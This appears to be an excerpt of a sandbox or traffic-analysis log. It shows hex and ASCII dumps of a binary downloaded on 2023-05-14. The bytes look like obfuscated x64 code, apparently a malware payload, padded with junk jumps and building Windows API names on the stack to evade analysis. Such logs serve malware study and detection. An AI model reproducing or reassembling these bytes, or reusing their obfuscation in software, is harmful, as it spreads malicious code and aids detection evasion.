20 9c e9 04
                            Data Ascii: tsyr77Hd$H$%7Hd$KUHL$0Hd$H$drZQ;HMp[NXdH$HL$(Br.$Hd$H$58tS\edZHd$wXu|$L$
                            2023-05-14 02:49:54 UTC192INData Raw: f9 e9 07 00 00 00 af e0 e6 37 21 b0 c7 72 07 b1 fa 37 36 f7 1b 3e 48 ff c4 38 f6 74 05 43 6c 61 11 e6 48 ff c4 f8 eb 02 ee 70 73 02 23 97 48 ff c4 48 ff c4 38 f6 e9 07 00 00 00 74 e1 7c eb ac 25 95 74 02 14 8a 48 ff c4 38 ed e9 05 00 00 00 9c 42 d7 74 77 74 05 88 a0 a5 76 a2 eb 06 a6 5f de a4 66 33 9e 48 8b 04 24 eb 07 d3 e0 6c e0 1f c4 27 48 8d 64 24 08 e9 03 00 00 00 57 c7 d4 eb 03 fe 48 cf 48 89 44 24 38 48 8d 64 24 f8 e9 07 00 00 00 37 ed 45 99 f9 ee f5 48 89 04 24 eb 07 ad 83 93 9d d4 cd 6f 9f eb 02 50 13 38 db 74 07 fb e3 ba 6b ac ed 8d e8 07 00 00 00 c4 d3 b9 7f e1 bd 95 48 83 c4 08 e9 06 00 00 00 4f d1 78 6b b9 db e9 02 00 00 00 19 a4 9e 48 8b 04 24 eb 06 cc cb d2 b3 ff 33 48 8d 64 24 08 e9 05 00 00 00 98 18 f6 8d 3c 48 8d 44 24 68 44 8b 4c 24 78
                            Data Ascii: 7!r76>H8tClaHps#HH8t|%tH8Btwtv_f3H$l'Hd$WHHD$8Hd$7EH$oP8tkHOxkH$3Hd$<HD$hDL$x
                            2023-05-14 02:49:54 UTC208INData Raw: c2 e8 02 00 00 00 79 f6 48 83 04 24 1a 38 ed eb 06 e9 bc 2d d9 5e d6 74 02 a3 64 c3 bc 4d d2 15 eb 04 16 92 8e e1 9e 58 eb 05 41 e2 35 4d f3 e8 e0 c9 fe ff 48 89 44 24 30 48 8d 44 24 21 eb 03 2e 9e 5c 9c f9 72 02 98 9c e8 04 00 00 00 c8 1a 73 93 48 83 c4 08 e9 03 00 00 00 56 c8 12 9d e9 07 00 00 00 66 f2 c5 a4 97 5f bc e9 05 00 00 00 cc 72 f8 75 98 48 8b f8 9c f9 eb 05 9c d5 5d 6e 60 72 06 d5 ab b1 41 b4 cd e8 04 00 00 00 a5 f0 20 30 48 ff c4 48 ff c4 e9 06 00 00 00 33 2a 31 5c b7 cd 48 ff c4 38 db eb 02 e7 1b 74 05 db 7b 65 cc f5 48 ff c4 f9 eb 02 fc 18 72 05 da 7d 4b fc 44 48 ff c4 e9 07 00 00 00 f7 c3 3e 80 9e f7 87 48 ff c4 eb 03 50 2d 41 48 ff c4 38 db eb 04 72 24 f6 e2 74 03 ae 77 4b 48 ff c4 f8 e9 04 00 00 00 49 91 c9 71 73 06 af 35 65 34 7e ef 9d
                            Data Ascii: yH$8-^tdMXA5MHD$0HD$!.\rsHVf_ruH]n`rA 0HH3*1\H8t{eHr}KDH>HP-AH8r$twKHIqs5e4~
                            2023-05-14 02:49:54 UTC224INData Raw: 8d 54 24 4c e9 05 00 00 00 4b 8e f2 c7 1f 50 e9 04 00 00 00 64 4a ad 4d 9f f8 73 06 ae d2 3c 98 95 e2 e8 02 00 00 00 dc c4 48 83 04 24 19 f9 eb 06 c3 7d 7a a3 96 2d 72 02 6c 1c c3 59 ff 75 15 e9 03 00 00 00 cb 67 bc e9 02 00 00 00 fb f9 9e 48 8b 04 24 eb 02 89 ae 48 8d 64 24 08 eb 05 cf 98 59 13 de 48 8d 4c 24 21 eb 04 7b 43 5d 7c 9c f9 e9 04 00 00 00 79 eb 38 fb 72 05 6c ed f5 7f 54 e8 03 00 00 00 df 1e 79 48 83 c4 08 e9 02 00 00 00 87 6e 9d eb 02 d9 cd e8 c9 cb fd ff 9c eb 06 78 7f 7b 5d 13 9b e8 07 00 00 00 ca 84 fa 49 c5 25 a3 48 83 04 24 25 f8 e9 06 00 00 00 5b d4 93 ea 69 93 73 06 c2 af 66 41 60 fa c3 bd 47 fd 1b eb 06 47 dc 92 e8 8e 32 9d eb 05 e4 d6 d8 e9 e9 e9 06 00 00 00 c0 f4 3d 2c ee 2c 48 8b c8 e8 9d ef 00 00 48 8b d0 48 8b 4c 24 30 e8 ef 83
                            Data Ascii: T$LKPdJMs<H$}z-rlYugH$Hd$YHL$!{C]|y8rlTyHnx{]I%H$%[isfA`GG2=,,HHHL$0
                            2023-05-14 02:49:54 UTC240INData Raw: ff c4 f9 72 06 94 e3 17 37 ef 18 48 ff c4 48 ff c4 f8 eb 03 cf 75 fd 73 04 f0 57 53 fc 48 ff c4 38 ed 74 03 d6 30 7f e9 05 00 00 00 90 cd 16 64 1e eb 06 a8 5f e6 30 c7 3b 9e 48 8b 04 24 e9 07 00 00 00 3a 90 56 8d ee b4 b1 48 8d 64 24 08 e9 06 00 00 00 36 f9 84 e9 2b c0 e8 9a 1c 01 00 48 8b c8 e8 ad 49 fe ff eb 04 d4 9a 71 c4 48 8d 64 24 f8 e9 03 00 00 00 e2 3b 66 48 89 04 24 e9 05 00 00 00 93 73 5c 81 65 9f e9 06 00 00 00 4e c2 7b e9 4e f2 38 db eb 07 fa 33 3b e0 94 b5 a6 74 03 1e 59 16 e8 04 00 00 00 a1 d1 9f 61 48 83 c4 08 9e 58 48 89 44 24 30 e9 06 00 00 00 cc d3 7c 1f c1 5b 50 e9 05 00 00 00 6e 6b d5 89 58 9f 38 c9 eb 03 f7 2a 11 74 04 e6 b7 13 ea e8 04 00 00 00 4b 55 bd 16 48 83 04 24 0f c3 80 bd 41 92 f6 eb 02 ed 1d eb 05 c8 b9 19 ae ff 9e 48 8b 04
                            Data Ascii: r7HHusWSH8t0d_0;H$:VHd$6+HIqHd$;fH$s\eN{N83;tYaHXHD$0|[PnkX8*tKUH$AH
                            2023-05-14 02:49:54 UTC256INData Raw: cb 2f aa 14 3f 2d d4 72 05 a9 1e 8e a5 6f eb 07 13 ae 11 26 33 ab 17 eb 03 b4 b3 a1 9e 58 eb 05 33 f7 85 1c 99 eb 04 74 be 73 7f 48 83 3c 24 0b e9 03 00 00 00 4c 45 7c 48 8d 64 24 f8 eb 05 d7 9b ac 8c 80 48 89 04 24 9f 38 ed 74 03 78 9e 8e e8 02 00 00 00 a8 8c 48 8d 64 24 08 9e 58 e9 04 00 00 00 25 19 2e bc 0f 83 5c 02 00 00 eb 05 b1 26 9c 93 ab 9c 38 f6 eb 06 ed ed 86 92 c8 eb 74 02 3a a6 e8 06 00 00 00 3e b7 2c c7 ec bf 48 83 c4 08 9d eb 05 dd 6e 79 93 40 e9 05 00 00 00 30 4c 32 af f2 48 8b 04 24 48 8b 4c 24 20 eb 06 d2 e3 2e f3 56 43 9c e9 05 00 00 00 12 73 c0 76 ec e9 05 00 00 00 24 24 67 93 ad e8 05 00 00 00 e2 cc 92 d9 4d 48 83 c4 08 eb 02 6c 5e 9d e9 03 00 00 00 52 ed 30 48 03 c8 50 9f e9 03 00 00 00 c2 30 57 e9 02 00 00 00 4c 6f e8 05 00 00 00 2d
                            Data Ascii: /?-ro&3X3tsH<$LE|Hd$H$8txHd$X%.\&8t:>,Hny@0L2H$HL$ .VCsv$$gMHl^R0HP0WLo-
                            2023-05-14 02:49:54 UTC272INData Raw: 58 e9 04 00 00 00 8f fa e8 92 c6 44 24 0a 52 c6 44 24 0b 65 c6 44 24 0c 6c c6 44 24 0d 65 c6 44 24 0e 61 c6 44 24 0f 73 c6 44 24 10 65 c6 44 24 11 43 eb 02 2f b9 9c 38 db eb 05 6e 34 24 ea 11 74 06 5a 77 5d a5 4f eb e8 05 00 00 00 82 d2 7e 32 50 48 ff c4 eb 03 f0 bc 41 48 ff c4 e9 02 00 00 00 64 b6 48 ff c4 f9 eb 03 75 48 2b 72 02 62 2a 48 ff c4 38 ff e9 02 00 00 00 92 19 74 06 54 e8 d8 e5 eb 80 48 ff c4 f9 eb 04 fa c1 d1 3f 72 07 65 87 2c 90 bb e3 ab 48 ff c4 38 f6 eb 06 f4 c5 23 b5 82 57 74 03 41 3a a4 48 ff c4 f9 eb 04 84 60 b2 58 72 05 f4 bc 9c 4a 56 48 ff c4 eb 05 da e2 91 2c a9 9d eb 07 c8 c8 82 3f bf 48 c1 eb 05 79 c9 a0 c4 eb c6 44 24 12 6c c6 44 24 13 65 50 eb 05 81 b3 cf 69 a2 9f eb 06 12 c6 57 4e 1b 7d f9 eb 04 3a a4 af c4 72 02 dc 62 e8 03 00
                            Data Ascii: XD$RD$eD$lD$eD$aD$sD$eD$C/8n4$tZw]O~2PHAHdHuH+rb*H8tTH?re,H8#WtA:H`XrJVH,?HyD$lD$ePiWN}:rb
                            2023-05-14 02:49:54 UTC288INData Raw: d1 ed c7 cc 36 e8 02 00 00 00 e5 9f 48 ff c4 eb 04 35 35 4c 63 48 ff c4 38 db 74 03 5b 8b 15 48 ff c4 e9 06 00 00 00 ce f6 54 65 ca 38 48 ff c4 f8 73 03 f2 b0 d4 48 ff c4 f9 72 04 b7 3b b6 6d 48 ff c4 f8 73 06 3e a1 64 94 fa b5 48 ff c4 f9 72 05 ae e1 48 a0 ed 48 ff c4 f8 73 03 b3 2f e9 e9 06 00 00 00 e9 ee 4d 59 ba 4b 9e 48 8b 04 24 48 8d 64 24 08 eb 02 7e f2 eb 03 b6 99 a2 e9 70 00 00 00 48 8b 04 24 48 ff c0 48 89 04 24 eb 04 f7 8a 25 26 50 9f e9 07 00 00 00 ec a1 de 2d a7 38 c4 38 d2 e9 04 00 00 00 16 da 42 2e 74 05 e5 ce fe 2a 25 e8 04 00 00 00 c3 a0 2e 89 48 83 04 24 20 f8 eb 06 5a 39 93 11 bf c0 73 04 63 4d f8 1c c3 50 95 9b e8 42 65 77 eb 04 ac 46 68 12 9e 48 8b 04 24 48 8d 64 24 08 e9 05 00 00 00 a1 fc 85 27 af 48 83 3c 24 11 e9 02 00 00 00 c2 71
                            Data Ascii: 6H55LcH8t[HTe8HsHr;mHs>dHrHHs/MYKH$Hd$~pH$HH$%&P-88B.t*%.H$ Z9scMPBewFhH$Hd$'H<$q
                            2023-05-14 02:49:54 UTC304INData Raw: 48 03 c8 48 8b c1 eb 06 68 e6 b5 ca 48 1c 48 8d 64 24 f8 e9 05 00 00 00 e5 52 19 17 9c 48 89 04 24 e9 05 00 00 00 4c a8 d8 5e c4 9f e9 05 00 00 00 8d 3d 19 c9 ec 38 c0 74 05 6f 94 fc 1d b8 e8 03 00 00 00 99 45 f4 48 8d 64 24 08 eb 06 da 95 af 60 50 92 9e 58 eb 07 28 7f 7d 1a f1 e7 6b 48 8b 0c 24 e9 06 00 00 00 f3 6e 74 33 5d d7 9c 38 e4 74 02 64 98 e8 03 00 00 00 e7 c8 80 48 8d 64 24 08 eb 02 7b 95 9d eb 04 ad d1 31 42 e9 06 00 00 00 71 50 83 b4 4b 32 0f b6 4c 0c 08 88 08 e9 bf fd ff ff e9 02 00 00 00 fa ce 9c e9 06 00 00 00 d5 c4 52 2a d7 55 f9 eb 03 13 e4 e7 72 03 d7 36 67 e8 03 00 00 00 34 36 a3 48 ff c4 38 f6 74 03 ba 58 77 48 ff c4 48 ff c4 48 ff c4 f9 eb 03 46 bb d0 72 02 41 8f 48 ff c4 eb 03 43 91 9e 48 ff c4 eb 06 90 7e 34 8b d3 46 48 ff c4 f9 eb
                            Data Ascii: HHhHHd$RH$L^=8toEHd$`PX(}kH$nt3]8tdHd${1BqPK2LR*Ur6g46H8tXwHHHFrAHCH~4FH
                            2023-05-14 02:49:54 UTC320INData Raw: cf 8b 48 ff c4 f9 eb 02 c9 e1 72 02 15 fd 48 ff c4 48 ff c4 f9 eb 07 c8 4d 30 8b 39 f0 56 72 02 ec f4 48 ff c4 f8 eb 06 7e 94 1c d3 9a 3b 73 07 3b f4 84 6f 8f 51 41 e9 06 00 00 00 ad 98 8b 5f 53 61 9d e9 04 00 00 00 a4 bb ff 3c e9 07 00 00 00 e2 42 4a fd f7 54 a9 c6 44 24 08 4e c6 44 24 09 74 c6 44 24 0a 43 50 9f e9 04 00 00 00 ad dd ad 20 38 e4 e9 06 00 00 00 c9 dd 3e a6 97 55 74 05 16 79 fc 8a b7 e8 06 00 00 00 41 31 cd cd 33 31 48 ff c4 f8 73 02 b4 7a 48 ff c4 eb 04 6e 39 59 f3 48 ff c4 f8 eb 06 c1 6c ae 65 58 a2 73 03 c5 a0 ac 48 ff c4 e9 05 00 00 00 62 ee 31 d5 e3 48 ff c4 48 ff c4 f8 73 03 27 6f 68 48 ff c4 f9 eb 07 d4 dc 85 1e 44 96 6c 72 05 8a 36 73 c2 87 48 ff c4 f8 eb 04 32 bb 89 90 73 07 16 26 4e 94 78 19 70 eb 06 ea d9 a8 bd 83 d1 eb 07 50 30
                            Data Ascii: HrHHM09VrH~;s;oQA_Sa<BJTD$ND$tD$CP 8>UtyA131HszHn9YHleXsHb1HHs'ohHDlr6sH2s&NxpP0
                            2023-05-14 02:49:54 UTC336INData Raw: fc 13 e8 03 00 00 00 4a cc e8 48 83 04 24 0f c3 d1 eb ee 1b cd 72 e9 02 00 00 00 af 36 eb 05 f6 f9 b7 a6 2b 9e 48 8b 04 24 e9 02 00 00 00 3a 25 48 8d 64 24 08 e9 04 00 00 00 84 28 28 73 e9 04 00 00 00 77 95 ad de 48 8b 44 24 30 e9 04 00 00 00 e1 85 7e cc 9c e9 04 00 00 00 aa 8b 56 e0 eb 03 e2 46 8f e8 02 00 00 00 24 90 48 83 c4 08 eb 07 7c 6e 17 a3 2f 77 fa 9d eb 05 df 25 a7 d8 c5 eb 05 6c 5d cf b9 3e e9 05 00 00 00 e9 00 00 00 00 48 83 c4 28 c3 48 89 4c 24 08 48 83 ec 28 e9 4d 00 00 00 50 e9 04 00 00 00 34 9d 28 b9 9f eb 07 f6 25 59 45 2c 9e 7e e9 05 00 00 00 8b 6c 26 91 1c e8 07 00 00 00 c5 5b 4a 52 99 78 ac 48 83 04 24 1e f9 eb 03 f6 8f 8c 72 05 a3 37 e9 55 27 c3 41 64 a6 77 eb 04 c9 2a 9a 36 9e 58 eb 02 45 a4 c6 44 24 08 4e c6 44 24 09 74 c6 44 24 0a
                            Data Ascii: JH$r6+H$:%Hd$((swHD$0~VF$H|n/w%l]>H(HL$H(MP4(%YE,~l&[JRxH$r7U'Adw*6XED$ND$tD$
                            2023-05-14 02:49:54 UTC352INData Raw: e9 07 00 00 00 3a a2 46 9c 43 99 45 48 8d 64 24 08 e9 07 00 00 00 fc b2 94 b7 d4 13 5e eb 07 5d 55 79 b3 9b 9e b5 c6 44 24 19 4d eb 07 51 36 9f 18 d2 74 84 9c e9 03 00 00 00 16 82 c0 e9 07 00 00 00 87 d9 22 42 7f 79 32 e8 04 00 00 00 1d f8 9a 9a 48 83 c4 08 9d e9 04 00 00 00 fa 3f 85 77 e9 06 00 00 00 6c c5 f1 c3 50 f6 c6 44 24 1a 65 eb 05 d4 a6 fa e6 3f 50 9f e9 04 00 00 00 e2 f0 b1 ff f9 e9 05 00 00 00 a9 d3 4c 1f ad 72 03 45 23 b9 e8 06 00 00 00 58 d2 47 78 65 5f 48 83 c4 08 e9 03 00 00 00 d9 f3 d7 e9 04 00 00 00 57 58 ca 27 9e 48 8b 04 24 eb 02 84 a1 48 8d 64 24 08 e9 02 00 00 00 77 81 eb 04 e0 ca 90 7d c6 44 24 1b 6d c6 44 24 1c 6f c6 44 24 1d 72 9c f9 eb 04 2c 8c 38 f6 72 03 ed 34 d6 e8 07 00 00 00 d9 f5 39 25 3a d6 cc 48 8d 64 24 08 9d e9 02 00 00
                            Data Ascii: :FCEHd$^]UyD$MQ6t"By2H?wlPD$e?PLrE#XGxe_HWX'H$Hd$w}D$mD$oD$r,8r49%:Hd$
                            2023-05-14 02:49:54 UTC368INData Raw: 3e 1a bb de d7 9f 72 06 3d 7d 9a be a9 7b 48 ff c4 f8 eb 03 f1 ca 4b 73 03 d4 cd d6 48 ff c4 f8 73 05 91 30 92 af c5 48 ff c4 38 f6 eb 07 8a 35 cf d3 25 8a 39 74 02 45 26 48 ff c4 f9 72 06 7b ba 20 93 c3 fb 48 ff c4 f8 73 02 3f 76 48 ff c4 38 e4 eb 06 92 3c a3 41 a7 db 74 07 25 ed 3d 22 36 e7 68 48 ff c4 f8 eb 05 7d 2d de db 9f 73 06 72 e7 f2 84 b4 88 eb 04 5a d1 77 14 9d e9 07 00 00 00 45 c6 32 11 f4 f1 ac 48 c7 04 24 00 00 00 00 48 8d 64 24 f8 48 89 04 24 eb 04 31 1b 85 19 9f f9 72 07 f5 b1 50 19 6d 95 95 e8 06 00 00 00 31 28 60 4b ba 8b 48 8d 64 24 08 eb 04 73 36 86 c5 eb 05 db 99 76 c9 4f 9e 58 eb 02 fd 36 eb 07 e3 f0 1f 9d 3b f4 bc e9 88 00 00 00 48 8b 04 24 48 ff c0 e9 02 00 00 00 15 89 9c 38 c0 74 07 d0 39 c1 cd fe e2 e1 e8 05 00 00 00 21 64 32 81
                            Data Ascii: >r=}{HKsHs0H85%9tE&Hr{ Hs?vH8<At%="6hH}-srZwE2H$Hd$H$1rPm1(`KHd$s6vOX6;H$H8t9!d2
                            2023-05-14 02:49:54 UTC384INData Raw: eb 05 3a c7 8b b4 73 f8 e9 04 00 00 00 68 88 af 8b 73 05 ca f8 68 46 c1 e8 06 00 00 00 b4 4f f4 f3 74 70 48 83 04 24 17 eb 02 29 ac c3 61 2e b8 82 68 c0 d4 9e 58 eb 06 25 58 87 26 fc 8d c6 44 24 1d 00 48 8d 64 24 f8 e9 03 00 00 00 11 b1 ab 48 89 04 24 9f e8 06 00 00 00 df c4 aa ca d1 b5 48 ff c4 f8 e9 06 00 00 00 95 55 84 ae 2c af 73 02 72 c9 48 ff c4 e9 02 00 00 00 28 f8 48 ff c4 38 ed eb 06 fb e9 1b 99 40 32 74 03 37 ac 30 48 ff c4 38 ed eb 05 64 ea 27 c0 1f 74 03 78 29 3f 48 ff c4 38 c0 e9 05 00 00 00 ad 48 ff 5d 2c 74 06 34 f8 40 74 ad f4 48 ff c4 f8 73 02 af 53 48 ff c4 f9 eb 03 a7 1e 26 72 03 24 f2 69 48 ff c4 f8 eb 04 a9 4f c4 5f 73 07 79 81 ac ce bb 9f f1 9e 48 8b 04 24 e9 03 00 00 00 f0 de b2 48 8d 64 24 08 e9 03 00 00 00 26 fc de eb 03 b4 41 99
                            Data Ascii: :shshFOtpH$)a.hX%X&D$Hd$H$HU,srH(H8@2t70H8d'tx)?H8H],t4@tHsSH&r$iHO_syH$Hd$&A
                            2023-05-14 02:49:54 UTC400INData Raw: 72 04 2a af 4f c9 48 ff c4 f9 72 04 71 c0 f8 cc e9 07 00 00 00 64 c7 1c a2 8d 41 ce eb 03 5b 30 d8 9e 58 eb 03 fb 64 15 e9 4e 01 00 00 e9 04 00 00 00 82 8c c6 1e 9c 38 ed e9 07 00 00 00 23 3d f8 4c 49 f5 ae 74 06 db d6 d1 28 93 54 e8 02 00 00 00 d3 22 48 ff c4 f8 73 04 9c 7b 91 a3 48 ff c4 38 f6 e9 06 00 00 00 8d ff cb 2a c9 eb 74 02 7f 1b 48 ff c4 f8 eb 07 64 9b cc 82 dd 5f df 73 04 f0 b0 8f ec 48 ff c4 38 f6 e9 04 00 00 00 ac 3b 1a ab 74 06 46 2d 6c cd e6 9f 48 ff c4 f9 eb 04 9a 95 81 74 72 03 4f 58 f1 48 ff c4 f8 73 03 30 5b ea 48 ff c4 e9 07 00 00 00 bd 96 41 b0 15 a6 5c 48 ff c4 38 c0 74 06 4a 7a 7d f2 69 ec e9 02 00 00 00 c0 70 9d eb 07 6e d4 ca 38 98 d9 a9 48 8b 44 24 08 48 ff c0 eb 04 c1 3d 9a d8 48 8d 64 24 f8 eb 04 aa 5a 83 83 48 89 04 24 9f f9
                            Data Ascii: r*OHrqdA[0XdN8#=LIt(T"Hs{H8*tHd_sH8;tF-lHtrOXHs0[HA\H8tJz}ipn8HD$H=Hd$ZH$
                            2023-05-14 02:49:54 UTC416INData Raw: 66 bd 45 8a af 56 74 06 63 eb 5e eb 3d e8 c3 43 29 44 b5 5c 26 61 9e 58 48 8b 44 24 48 e9 d0 00 00 00 e9 02 00 00 00 69 b1 48 8d 64 24 f8 e9 03 00 00 00 5c fb 37 48 89 04 24 eb 03 de fb 96 9f e9 02 00 00 00 59 3e e8 05 00 00 00 54 34 96 74 fb 48 ff c4 38 ff 74 04 3a bc 5a d2 48 ff c4 38 c9 e9 02 00 00 00 4f 55 74 05 12 96 15 85 b9 48 ff c4 f9 e9 03 00 00 00 34 81 b0 72 05 2b c3 a5 91 3f 48 ff c4 eb 04 71 43 eb e2 48 ff c4 f8 73 04 e3 e8 9f 76 48 ff c4 48 ff c4 38 ed e9 03 00 00 00 9b cc 7a 74 02 5f 44 48 ff c4 f9 e9 03 00 00 00 78 e0 8b 72 05 68 23 9b 20 24 e9 07 00 00 00 3f 3d a3 76 d2 88 9c 9e 48 8b 04 24 eb 07 4a 6f 34 c8 b6 32 32 48 8d 64 24 08 eb 07 47 1e 59 af 12 4e d5 eb 07 2c 4e bc ec 1f 1b a1 e9 00 00 00 00 48 83 c4 38 c3 88 54 24 10 48 89 4c 24
                            Data Ascii: fEVtc^=C)D\&aXHD$HiHd$\7H$Y>T4tH8t:ZH8OUtH4r+?HqCHsvHH8zt_DHxrh# $?=vH$Jo422Hd$GYN,NH8T$HL$
                            2023-05-14 02:49:54 UTC432INData Raw: b5 15 38 9d eb 05 2d 55 78 d4 52 2d 00 00 00 e0 89 44 24 24 83 7c 24 24 01 eb 04 2a 9c 77 fc 9c e9 02 00 00 00 62 17 e8 02 00 00 00 17 7e 48 83 c4 08 9d e9 05 00 00 00 81 b9 c8 54 cb 0f 84 70 02 00 00 48 8d 64 24 f8 eb 05 8b bb 53 1d 50 48 89 04 24 e9 07 00 00 00 22 aa f5 57 37 ee 6d 9f e9 04 00 00 00 25 97 50 4b f8 73 02 8a 53 e8 02 00 00 00 35 a5 48 ff c4 f9 e9 07 00 00 00 cf a7 ef 45 3a e1 1a 72 07 b3 26 f9 4b cf 9c ae 48 ff c4 eb 02 7e 12 48 ff c4 f9 e9 07 00 00 00 5f fd 46 bc 54 30 a3 72 03 a6 39 54 48 ff c4 38 f6 eb 06 f0 fb 59 5d 22 70 74 04 4a 96 c9 3e 48 ff c4 f8 e9 05 00 00 00 ae f5 9e 1b ff 73 04 d2 c1 7c b3 48 ff c4 f8 73 04 44 6d 12 55 48 ff c4 e9 06 00 00 00 16 2d b7 76 bf df 48 ff c4 38 c0 74 04 68 52 60 bc eb 07 f6 5f f2 7a 32 9b 21 9e 58
                            Data Ascii: 8-UxR-D$$|$$*wb~HTpHd$SPH$"W7m%PKsS5HE:r&KH~H_FT0r9TH8Y]"ptJ>Hs|HsDmUH-vH8thR`_z2!X
                            2023-05-14 02:49:54 UTC448INData Raw: c4 38 e4 eb 07 2c 83 6c af cb fc 40 74 02 24 b0 48 ff c4 38 c0 e9 06 00 00 00 c3 a3 6b c3 1c 35 74 06 56 55 31 1b e5 63 48 ff c4 e9 02 00 00 00 51 6c 48 ff c4 f8 73 07 c1 59 7d 33 3e bf b6 48 ff c4 f9 eb 05 20 9d 93 26 df 72 02 d3 68 48 ff c4 f8 eb 06 ae c7 7d 26 a7 1d 73 06 6b 4c 92 12 be d0 48 ff c4 f9 e9 05 00 00 00 23 cc c2 5c dc 72 05 ce 7a a2 77 7e 48 ff c4 f9 e9 04 00 00 00 46 81 6d fd 72 03 77 6b a3 eb 06 90 39 40 79 bb b0 9e 58 e9 02 00 00 00 47 b5 0f 85 05 00 00 00 e9 3b 0e 00 00 8b 44 24 44 48 6b c0 18 e9 02 00 00 00 53 4f 48 8d 64 24 f8 48 89 04 24 e9 05 00 00 00 48 f0 12 86 c4 9f e9 07 00 00 00 31 17 7f e2 2d e3 38 e8 07 00 00 00 92 46 7d 52 8f 60 e2 48 83 04 24 14 c3 d4 ad 5e 9d 2f 55 af eb 06 d5 97 72 34 c3 de 9e 48 8b 04 24 48 8d 64 24 08
                            Data Ascii: 8,l@t$H8k5tVU1cHQlHsY}3>H &rhH}&skLH#\rzw~HFmrwk9@yXG;D$DHkSOHd$H$H1-8F}R`H$^/Ur4H$Hd$
                            2023-05-14 02:49:54 UTC464INData Raw: 8d 54 24 38 48 8b 4c 24 30 e8 93 c6 fb ff 48 8d 64 24 f8 eb 04 1e 7b a8 bd 48 89 04 24 e9 03 00 00 00 c1 12 4a 9f f8 eb 04 9c 6a cc de 73 04 fe e2 23 a1 e8 02 00 00 00 1d a7 48 ff c4 38 d2 eb 07 a5 6e 57 37 6b c8 ba 74 05 6d 23 fc da a3 48 ff c4 e9 05 00 00 00 d5 dc ca b0 73 48 ff c4 e9 04 00 00 00 43 2d a9 a0 48 ff c4 48 ff c4 f9 eb 07 c5 fa b9 be d2 4c a5 72 02 5b f8 48 ff c4 f9 72 05 44 ef e8 73 53 48 ff c4 38 db e9 06 00 00 00 3e f8 1c 7b 57 a9 74 06 30 d7 15 92 78 19 48 ff c4 eb 02 c8 68 e9 04 00 00 00 37 ec 4a 16 9e 58 eb 07 b0 b4 3f 86 fa 18 bd eb 06 32 ef 64 44 eb 2e 48 83 f8 30 9c f9 72 06 82 fb be aa cd fa e8 02 00 00 00 a5 3f 48 83 04 24 21 f9 eb 07 7c ee 95 2b 7f 85 f6 72 06 fb c7 ac aa a9 e3 c3 63 1e e2 30 7e ca d7 eb 03 85 89 f5 9d 0f 84 54
                            Data Ascii: T$8HL$0Hd${H$Jjs#H8nW7ktm#HsHC-HHLr[HrDsSH8>{Wt0xHh7JX?2dD.H0r?H$!|+rc0~T
                            2023-05-14 02:49:54 UTC480INData Raw: 48 ff c4 38 d2 eb 07 ed 7e d8 f8 77 9b 64 74 06 69 d9 c7 b2 2d d0 48 ff c4 f9 eb 02 e2 f8 72 03 f2 b9 9e 48 ff c4 38 d2 74 03 13 c1 7e 48 ff c4 eb 07 c7 b4 71 e6 af a7 5c e9 07 00 00 00 d6 21 c4 7e 45 2c 40 9e 48 8b 04 24 eb 06 d5 b4 11 96 68 3e 48 8d 64 24 08 e9 04 00 00 00 c6 dd cd 49 eb 02 c2 ea 48 8b c1 c6 00 00 e9 02 00 00 00 b0 7e 9c 38 ed 74 04 fb a3 db 6a e8 05 00 00 00 de 65 1f 3f 55 48 83 c4 08 9d eb 07 b8 e8 20 af 8f f2 13 eb 02 fd ab e9 0e fd ff ff eb 02 57 b8 48 8d 64 24 f8 e9 06 00 00 00 a3 47 f7 85 ff 30 48 89 04 24 9f eb 04 c9 a9 61 30 e8 03 00 00 00 44 c7 a9 48 ff c4 f9 e9 05 00 00 00 25 b5 e3 88 2e 72 06 da fe 20 e5 f1 7b 48 ff c4 f8 73 02 e1 4a 48 ff c4 38 f6 eb 03 1c 2f b2 74 02 97 b5 48 ff c4 f8 eb 02 84 ec 73 07 f8 8c 72 51 6f 14 ea
                            Data Ascii: H8~wdti-HrH8t~Hq\!~E,@H$h>Hd$IH~8tje?UH WHd$G0H$a0DH%.r {HsJH8/tHsrQo
                            2023-05-14 02:49:54 UTC496INData Raw: f9 9a 59 74 06 9b 1a 2f 28 b4 dc e8 05 00 00 00 30 2b 9c a3 98 48 8d 64 24 08 9e 48 8b 04 24 48 8d 64 24 08 eb 04 dd f3 54 9b 48 89 44 24 38 e9 00 00 00 00 c6 44 24 30 01 48 8b 44 24 38 83 78 0c 00 0f 84 da 02 00 00 48 8b 44 24 38 8b 00 48 8b 8c 24 c8 00 00 00 48 03 c8 48 8b c1 48 89 84 24 88 00 00 00 48 8b 44 24 38 8b 40 10 48 8b 8c 24 c8 00 00 00 48 03 c8 48 8b c1 48 89 44 24 58 48 8b 44 24 38 8b 40 0c 48 8b 8c 24 c8 00 00 00 48 03 c8 48 8b c1 48 89 44 24 50 48 8b 4c 24 50 e8 b3 fc fb ff 48 89 44 24 68 48 83 7c 24 68 00 0f 85 4f 00 00 00 c6 44 24 30 00 48 8d 44 24 31 48 8b f8 33 c0 b9 01 00 00 00 f3 aa 48 8d 54 24 78 48 8d 4c 24 31 e8 55 02 00 00 48 8b c8 e8 d8 88 00 00 4c 8b 4c 24 50 4c 8b c0 48 8b 94 24 d8 00 00 00 48 8b 8c 24 d0 00 00 00 e8 8d 17 fc
                            Data Ascii: Yt/(0+Hd$H$Hd$THD$8D$0HD$8xHD$8H$HHH$HD$8@H$HHHD$XHD$8@H$HHHD$PHL$PHD$hH|$hOD$0HD$1H3HT$xHL$1UHLL$PLH$H$
                            2023-05-14 02:49:54 UTC512INData Raw: 07 c8 40 49 11 3a a2 dc 9f e9 06 00 00 00 eb 46 e9 2e d1 25 eb 02 5a d7 e8 03 00 00 00 80 c4 d6 48 83 c4 08 e9 02 00 00 00 24 f2 eb 02 b6 94 9e 58 e9 06 00 00 00 2d 26 2d 6e 53 1c 48 8b f8 e9 02 00 00 00 2f 17 50 eb 05 e4 68 55 f0 56 9f eb 04 60 81 15 4c f8 73 02 8d ca e8 06 00 00 00 74 28 94 14 e9 d8 48 8d 64 24 08 eb 02 49 8f e9 02 00 00 00 53 d3 9e 48 8b 04 24 e9 03 00 00 00 d8 e1 16 48 8d 64 24 08 eb 04 23 29 63 f1 33 c0 b9 01 00 00 00 f3 aa 48 8d 54 24 48 48 8d 4c 24 20 50 e9 04 00 00 00 b4 e0 31 d4 9f eb 06 d7 83 17 d9 5c 44 f9 e9 04 00 00 00 15 43 b5 2b 72 04 66 6b de db e8 04 00 00 00 ee 22 34 a5 48 8d 64 24 08 e9 02 00 00 00 d9 fe e9 07 00 00 00 11 92 90 b3 36 47 72 9e 48 8b 04 24 48 8d 64 24 08 eb 02 3b 7d e8 4b 10 fa ff e9 06 00 00 00 82 fc fa
